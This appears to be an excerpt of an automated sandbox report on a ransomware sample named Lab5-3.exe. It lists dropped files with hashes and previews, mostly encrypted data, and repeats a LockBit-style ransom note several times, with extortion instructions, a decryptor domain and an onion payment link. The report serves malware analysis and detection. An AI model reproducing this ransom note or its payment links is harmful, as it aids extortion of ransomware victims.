                                                                                                          Preview:.D_..Se.w<....&..J2.....=..fjr.."G........P.S.....+.Q....E..`.... ..d.'Q.......Tob...U.@\H...I...yI.5.B0....m..n....B}{...d)..d.8...I.R..V.B..T.V.....`.Yg..X.~U.AO...9....K.......NX..f.:.n.S<+..x/.0g...U/WL.....U...^..8.^k..6ogc...*.j.1..I.$...4.P.,..1..v.7....z6..Ts.n\.$<....h....2D...R0f.....X.Q...8C...J.o;P\...!...$.....!@.B.....<Mn........Z..[F....6>........a...9,.....i.l.).+.V.\Pb.M/...T.....p\O...[......m............?.'V.C..f.3~3...J....%.zZ^}..@f..6.u....;TX........IDm.0q.`rZQ...z/.mn/8.]..../...-...5.%.....!"_...|{t.......<I>.EWSi......U...Z*p..t.*.......P.W.Eo.,(..3..b. I<..........t../q..... 3..&.HJ.B..~.v.$cD.{.[.NV...%../...z.........F}d..._.@o......Ga.;....~.r....LJf.g..F:..AW.Te..j..XO<..!j.....H.,.........k.g.t..?.J....Y.C....@..G-.."5.r(...=..:.....w\.4h.E..B.....(.3..E....S..N<.+V...-"......#.6k..../O.S..l#pgGQ.......T...C..|....h$.."S..WF....9..H.9Yu.8.W"..>/..u.:..n-.y/..[Xb.q.#6Z~....]...Gm....'............o.?..0rH..>i...q..J..A
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5936
                                                                                                          Entropy (8bit):7.9731354195580595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:wwE3LQoeTOZu5dMQ85g6FJGpeh2GoyYcHAQ0g+ejjW7YGx0uKeY2ElUJ:wwW52wftgppoHroejWn0Cb
                                                                                                          MD5:92ADE9CBBF3982C5E5A1798A298EE95B
                                                                                                          SHA1:DA0B003260263A26BF2F46B8FC2E8501749F47E7
                                                                                                          SHA-256:CA42483D6225B998A1899C7004FFE87D5634B54699671E0A4FBB085D136DA227
                                                                                                          SHA-512:96E2DC332A90116E150DDCBE514B036B2E043586094203EF0B9597BCB57C5AB2E5A2F275FDED190B40C87B677A9770C1F15BDD4F18E9EAAF4F1BDAF1C0601D2B
                                                                                                          Malicious:false
                                                                                                          Preview:.X ...Y...T.....Q.J....R.5p.J.+\z...n..!.c..:..,yz.....8#.........8Y*...C/|.........Y..#......x.$...]._b..mr.A....M....3x..%.7....Z.fp.1;x:...L.....O........h.D.3...nZ..,..N...%2=..0.T..O%....O1T6...U.z....9..N.......O:.......O..v..m..;.m.o*C..\28......W.=>...9.j...,.........*C+../..[.<......C......*.t..8P2.K..h.......`..M.A..}...^....&....FK.sD?..M.>.(....(.~.|1..]....m6G.......w..=.L..+...Q.Z.c..*....#.p..C...nSQ..<.S....F...).icE+...I...=vB|...Y[..9....7.7l%.N..7^I....D...=|......4[.7...eO%.^...v.C..H<....c..V._.@..R.B.!.f_.....~...L.Y..G..R-!_+).<~4`Lz..6.L.w.TT..Y...8.p\...Y.}3.....]@..-..Hm......c48...{.................Z#.t{..*9.?..p.K...9=z.Z...jE.)....3|..-...6?j.X........j~.T....d.I.j.B.....p.H.,.$.$B*...\$o.+0gV.Qs2.m...O91Uz.V6..._7.s.q.....G&.~.'`.Zr...@./+.vq.b.j..,l|.X...H......_........}.UQ.'.355....eh..h....9...C..f..L.GZ..T.`.B..m..8..$+.Q.q..32. e.}^...pyP..>..R.r...,...)1.......2.......+O..#...mV.m...\....R.....-
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6240
                                                                                                          Entropy (8bit):7.9729851080001
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xVKRl4hoV8/+SiCFLLPWa+feFyBqqzivFroJL8Nl0Cb:xVpu8/t3ua0eYBZCFcJo7tb
                                                                                                          MD5:196520F3B9DCEE940BE10EBDCF56512C
                                                                                                          SHA1:2FA0856FF33EEED8882171A242059EC8C391F7DD
                                                                                                          SHA-256:B1C4F3A64401B70C1BA0C251062583C8EBE71066ED2CC577A8FE23049D5F8278
                                                                                                          SHA-512:1A63042FCD74772066F8977113C739E52D1F435F2679405ADA7CC73156797BC8380D5DC3C134A6F712798A471E10B9B80AF1C25793C0151D9FED5AAE9D15E73C
                                                                                                          Malicious:false
                                                                                                          Preview:..+c6.Hh..q.. ..^.....R{...CnG.....K3.u(.q.Z..Qf....\I...?C.TI.d.m.<"^.J@..&e..Am.UNqK-.\..[=_k^..Ej..ij.t9.h....7.a...N..j.#.e};.Ar...6..F....c..%fj.J1...!...E...-...@.h..kU..C#...+.%.....o........&....j....4aR~...KA......^..xve.../...s...>E2..z...F.lak.$={.]....J]d.......k8R..~..I.).F.K.]. *.....(..k9%Ij$#.....V. ._e2..M:s...^,..J.......|.j(..7h3.`..D...Q.8..b..J....=J7.R".i...2k7u+M.Q..lf~E.....Rb......{....83.?.*d.j..}<.M..x.!7..?..3~.A~.l.V.F...:U.o..S.c..{......O.t.E...M..*.k.?.K.J.@0]@.^.......uZ...%....Z.6..=*.7..n.Qb[...=...6iS..].n_\.d.KB......h8..v...T&M...e....q.q........h..7g.H3.m3V....<.."..#.]../_.R..k...V..@....D..~.\....u......B\y..G.T+..;.;...2,.l...KwC.........F.'..D..b.t..a...90LL.H.....X.dKm&b...*..'#=.r..@@.h.8...&:..[..>w.....o.Se;,....J2_v]....C.L~..n.m...b.....+:n..y........'Xs_.\..\-aN..v.i.4.'3_'...I1G.....!O.<...:...z.c..#Q..3i._mb...b.F.<..UK..C..j...*.)..~...[.a.......r..Ha.A.!K.........?!.)..Y~...1.[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6560
                                                                                                          Entropy (8bit):7.97225983894339
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:j8PiE4Eknm4fvBdvj+7yiXz1X4jrHNx3PqSKDXC0Cb:j8qEn5WHvsyiDB4jrj3PqSyXCtb
                                                                                                          MD5:4F9B5CAE8C114A2A7ED256428442FCBC
                                                                                                          SHA1:762567C15ED72DEAF0931CBB92F143A1B5DF7486
                                                                                                          SHA-256:DF33622EA0131B64CC61F13F07C14C2BA03F988B2BB37911E1CCD344B6D1B6B6
                                                                                                          SHA-512:A4EF04ED556FD68CA8270CE08C94D0BC1089E97768F7371354609B44ADD204103F9A78C54D09102C7A5AEA698DEC9927F3562403D85C207B93EB956AD0F47D03
                                                                                                          Malicious:false
                                                                                                          Preview:....u4............&....P...S...<D--nnP....gF....:..7...3.....A{6..s6.x...4..s...R.bN.e..a..(...E.AD..o@.Z..._1.x@.%b>O...Uiq^v.v.\.E'.Pte.......).....)}8[.!.......)e2.nd.I.....#[....9.....Zy....-.......o.o.*g..M..j.d<.....b....i)..K...?...3=.'....}.J.w~...y..1.j.Z........z.tp.X.\4.T.1.....:.2.%v/J.".g...._..}v..n..uAC.!.fR...&5..Mk...l...M....i@......*....B..J...7f.....Eg....[...<.......*..*.oe~.nK.?...X.."Y....>Dt...&....*.V....j.m'.p(..[.?x =ce....%o..b_.yvk..U.1.D.SIkF....f......ORFw.D.6.x@H.lR.}.-C._w...{T...D.Y..O.98.AR.O..3c7.t..&t.w.....4M^......z.......m6..Fj..n.......rm...%zZ...M.M.n.,z...j:...._.%._.....@...9...^....h.~...s6)ma..9.\FK....kX...bq'.9.J..._.....Im............._9...$Z.........j.Qv...)M..9.K..wp...... Ll...{...5.....e_.q.#G...G?.......l..th..3K...+.4G..h...;...ym..5.CY"..6..N.....x.EK.$;&.|..wP.:...k........g.o1.....C...<.5...W..o....X.C......?..o.......Y..I...\......l10..<...(..0#./B..+....!.@\..^...wr..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6192
                                                                                                          Entropy (8bit):7.965836787021044
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:5V8LY8osGSTRseV+HK8yIU2VUwdfJwNb4q0SSoytXOfCZsObdVmqhgLmGGx0uKeR:L8HoWTVBSU2VUowNEq0Ro8iWgL40Cb
                                                                                                          MD5:496A6890A34000CE96F05EE130B13570
                                                                                                          SHA1:E2543E07B4CF5FCECE4A7607C4F5CD6E06389D25
                                                                                                          SHA-256:B6A9F76CD81B151720DD72BAEFEF61F9565AC92F02EBCDF492FB33289ED20015
                                                                                                          SHA-512:7BE37AD7C7C89AA95181D312AFB0CE2511F8DADFE03DEA679B56F7029DB17A305ED6367078040EC2173D9F81F5953402AD63FFEEBB9F6360B820538A587CD1F3
                                                                                                          Malicious:false
                                                                                                          Preview:....1...f(.E..*.6L..6o..H....[..Ds..j5v%'.(.8.hHZ......].".i..:...t...k2O...wx...: .<.m....@`..J1P.....p.=,.R.-.2.W~60$.p...q...........<.k...g"..+....j".f...u...1...2...27..h....\......t<....~P..7k...G8.....~E.1..9t8$..H3v..[?...x..>...Ly.....+.~[Z.ND]f.....-..|<.B.Gp..."h.DD.....{8Xf.>.,.^....1.4@.]Y."j....."./ I~..T.W}..'..4YF...I....jr.k..$u.dVW..@..{uNow7T.....,.}.q.._ZM.>ryd.......CC....,~..."?...jn6.z&.N.....<...v.....%.-.K.=...8.mK.~fn...FLA/..6.:..E........Z.8.DoY.h..fDo..D9..:xi........i.I......X-t}.}..E.Nf........D..x......".......``.M...R.xqo...d.AD....v-.#.O.*..h...........%..J.....Pd.n...$.,?Y;...O...v<..r7....~..8@@...S..aqz.H.8..tD..ZJ..D.|]{.7.3..B.....`.@.G.QIm.~...v..B.f...%...N...+.F%,.......B3..H.^.n..Q....z.k...1....H...........j..j.I#..?<R;Y.M.8..@.iY{?.g.r%.h.8.4.<..a..=@.n...wU(0.M..`..J....oo.0Y.!:#.Dt.D.....2"....j:A...........H.......R.$.../Yu....]4...+......y.[{....p..$_....ddcTM..M....".n.. .....a...R..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6352
                                                                                                          Entropy (8bit):7.971151781751957
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4hBbAISAwGiEUwRxkH7pH5WSQuvVbVXelc0Cb:4hSI3iExg7pYUvVb6ctb
                                                                                                          MD5:D6F89F6CF829055B21D225F264C4E603
                                                                                                          SHA1:C018D2153376BBDEB70B1F1C0453686CDB56AC52
                                                                                                          SHA-256:C91403DE3369FDC2F5B9988D1E6A791870645124155B774582E02BABE04D9BE9
                                                                                                          SHA-512:59E952F373571CD5E95A914C086D014EB2170DF2FF830A5012D63DC9B4AC20FC3A608A4B9988D1086352C2CB2A26F97D88B26CC13F3FA6E4E4FEF88CDC8365D1
                                                                                                          Malicious:false
                                                                                                          Preview:..5..W.4r.}....d.+.S.>}..e.C..Nd...j.....*l....A.4...A}.Y..n'.f1.!F.*..R...2:.5.Bv...<_[.l...#/..3...B..`..X..a.<...x|...".I3f.......Xd6)..}t.v\.B8..^...$QZ1.lo..z`.vK.....p.A..+..7A......s.M.=qFY$..M.45K.O.....{.4..1..R....n.....J|.S..qb%.'.)...1z...d.vb.......m..;...x......u....;...)xA].Ch_.J^le...;9.%A.....n.+.C.\.$>.{,..o......JG......U.h...VE.9....o,qB0hSJ..y..|HU.y....;.EA15.G.r....1p...B]...,....l..nab.#~.kA.D...6....k.?x...;.jp.M....k. #c....~.t...F.B3]..[.\.Ts...Y_BD.K..\.0b...=../.....g..uK.Rd....l..ni...<\.G.A...iU...='..}:u.,3...[....I..8..RL.vrM.X.V...H..,.p...^_...+P.O._%=@.7.......[....Hw.jCs...$.....%.4..q.....F......I.F....^h=!7dFmJ..]i.s.....F.jm.XawD%|.......ny..r..q....Tp..a@@.o..(..-fbX.Y...Y..".....fR......)!.........?......X.|..G.../.}......@.Y....[...&..V...n.YZ..h)...........g.e.B..,...{..K.........d.a..Q.F7.p......z[B..U..v.Q......o....:..$.`...v..Rv....Pv]Ah\(Wy..i...F~..r...i.a...2N.%.f..8..(voR..RlD
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5824
                                                                                                          Entropy (8bit):7.966954651208616
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:SjMTrgeQoZekM4lGaRddSHCV1VU8Na/JXtw76DwdsdxKArmjn831z2t0KeGiGx0a:0MoeQotZlvdaCFZ0nw76DYsdxrt38FBZ
                                                                                                          MD5:B63E199F159396688B86FAF65E3ADF44
                                                                                                          SHA1:8C1B2CF07083C9A6587BC77B85E15ECEC7784D60
                                                                                                          SHA-256:2D37E48FE8DD5841005418CB1EBA94FDA1010FF56C89FFE266766D6FA99CF97D
                                                                                                          SHA-512:6802E256E27E514FBB4284438D5A87698689747F1F40E3EA200A83DA2D3B9A09299873BE2880773C56263CE8CA0105F1CC7C1482052F4F389A78B3F3AEFC0D77
                                                                                                          Malicious:false
                                                                                                          Preview:.@.b}....A.{.x!..^.q4$....""0+.@"....:<.....OX..g.'|.........,.D.]$..{..lQ..+..%..T..2.......O.a..o@....z=..)[X....v_9`..VZ.*>..B.... ..`:..a.../......1...1..............n.E.:.n..=8.E....g."........j..L7B=..XJ.ON....|Q..4g...t!cg...2.%../....%=..(4).).....@..#nt;.^n]c...........1.<v.`..D...u...~...$...>O.....d^Oh`.....C."N.95..m....S..('8s{J$a..%.`\..a....<6..z%nj....-..i.J..?9B.a..w...../@....3..o....Ny........bf...*..F..sC....@i..'.=F.zD#:..D.d:@...d5..8R......}..1G%B......x9*.......lf....g.R#..vz.\.....@.-.s...d.^....z..l.LMQ......1O.NUq;.<....7..t.NB..n.x.j.........{.iIB.<o.(1.?.<.z..f.....1.n. ..>....?..6J...g..8...k.2.o..q.6..R...c......OR.X...2....e.D$.c=Oh.5PS.t.%...alii.G`..Eln`...Md.c...^.4><..7..;f...8..2..Vj$)~fF.:J..Go.S}..7..3l3.....U...T........>.^..ri..?............E..g"..C....]*o.&....N..K<X..!.L>v..d.jk&q.2.u.h*....}...P.Ry.x.D..^kh.I.....R3V....C..Zr>....}.(.<a...<>..%...*...~..L...B.C..Nr.4|....Q..GY...k...)..fpE.Sl.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8416
                                                                                                          Entropy (8bit):7.9747030591255506
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:s8szfBUpb2S5MBiMRB3pLUk1CnXwIF4fc5LD0Cb:IzfKiXZV4n6fc5Htb
                                                                                                          MD5:42C74720B3881E472E29C746D261A105
                                                                                                          SHA1:EEC85A038CA0347EFFD0714B7229C4BE37499E3C
                                                                                                          SHA-256:C9C4C03BA04954F6E678C3D4BC9CDF757B123B5F22381C85FC192BFD84AF6249
                                                                                                          SHA-512:F059D746F492952A96E5531E3CE73D214D8994FE61C48F3E3F0D30197E636D3D0C2B4D14A9CE7667480176580C9FC5505FF6CC273DC4E683C422000358F0E8F4
                                                                                                          Malicious:false
                                                                                                          Preview:W...=W.....{...........(..&P..H....6.9.g.E.^fcEN.a..).'...8B4*#...~d..V!9..C....ih...(C..P.-}.z.......e.[s.......!:F..2....Ln.....cvP...t3.C.4Kv@..t?..|7Z.,.t~_.?..[.Y.jR......."....$.t.I...<2..P..Q.J....8@.}!.?n...F\....I...-.Z.%.3c...P....|.....w....w(...!Y...v..Fu,c......r..O.4(o..H.&.m.u}PoZFR..F..Vu.],......X...]..1..@.z..p.0..&^;.Q#.....6....Ty.z&....T\.....I"...R.Z.4%r.Y.M.......~,.P.......mO...t...E|..9.8.N.u....+...&HL.o..W&}.kA....Q.:.!..e..{....6g`.NB....a.K.i..l....Hp....e.....>.|:...P. .I.r.-#......t....E#.Wm$..Y^L2....Q.J..,c.....U.Y.-}b....;.q.....r(.5..5..5......Yz..`9.w......O.........1....z..q.{...]..f.!Y.L...<.H..t.gu.P...%..G.@.#d.".<2`..vA.k.@GT.........q.!y7.p...'..-.\n..|3<.,......M....].."..k3..........Oj...:.. :1......N.8.4..q,H."+......j.FS..............X....j..5..@gI...?.... ..F......]i}....Xj...r...j...._....:.iJ...su.. C...X|.n.....a.s.|9...s.s*..3../......i..d........ve:..-.`...!.4>..(.+..!..$.>.....2.....u
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
